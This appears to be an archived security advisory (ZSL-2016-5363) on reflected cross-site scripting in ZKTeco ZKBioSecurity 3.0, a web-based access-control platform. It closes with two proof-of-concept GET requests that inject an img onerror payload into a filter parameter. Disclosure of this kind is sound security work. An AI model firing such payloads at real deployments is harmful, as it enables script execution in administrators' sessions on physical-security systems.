ZKTeco ZKBioSecurity 3.0 Cross Site Scripting

ZKTeco ZKBioSecurity 3.0 Cross Site Scripting: Posted Aug 31, 2016; Authored by LiquidWorm | Site zeroscience.mk; ZKBioSecurity suffers from multiple reflected cross site scripting vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Version 3.0.1.0_R_230 is affected.; tags | exploit, arbitrary, vulnerability, xss; SHA-256 | 661201e7c27f788dde650a2d5226bddfa2456cc33d8e22a68d5114c6bd2a7de2; Download | Favorite | View

ZKTeco ZKBioSecurity 3.0 Cross Site Scripting

i>>?
ZKTeco ZKBioSecurity 3.0 Multiple XSS Vulnerabilities


Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
                  Platform: 3.0.1.0_R_230
                  Personnel: 1.0.1.0_R_1916
                  Access: 6.0.1.0_R_1757
                  Elevator: 2.0.1.0_R_777
                  Visitor: 2.0.1.0_R_877
                  Video:2.0.1.0_R_489
                  Adms: 1.0.1.0_R_197

Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.

Desc: ZKBioSecurity suffers from multiple reflected XSS vulnerabilities when
input passed via several parameters to several scripts is not properly sanitized
before being returned to the user. This can be exploited to execute arbitrary
HTML and script code in a user's browser session in context of an affected site.


Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)
           Apache-Coyote/1.1
           Apache Tomcat/7.0.56


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5363
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5363.php


18.07.2016

--


GET /authRoleAction!getAll.action?packageName=auth&un=1468847752607_1814&systemCode=base&pager.posStart=0&pager.pageSize=50&xmlFileName=AuthGroup&filter:authGroupSet.id=1<img%20src%3da%20onerror%3dalert(1)> HTTP/1.1
GET /authUserAction!getAll.action?packageName=auth&un=1468847752607_1814&systemCode=base&pager.posStart=0&pager.pageSize=50&xmlFileName=AuthGroup&filter:authGroupSet.id=1<img%20src%3da%20onerror%3dalert(1)> HTTP/1.1

Top Authors In Last 30 Days

Red Hat 183 files
Ubuntu 59 files
Debian 20 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Google Security Research 6 files
E1.Coders 4 files
Ersin Erenler 4 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,007)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,166)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,459)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,428)
UNIX (9,390)
UnixWare (187)
Windows (6,647)
Other

ZKTeco ZKBioSecurity 3.0 Cross Site Scripting

ZKTeco ZKBioSecurity 3.0 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ZKTeco ZKBioSecurity 3.0 Cross Site Scripting

Share This

ZKTeco ZKBioSecurity 3.0 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems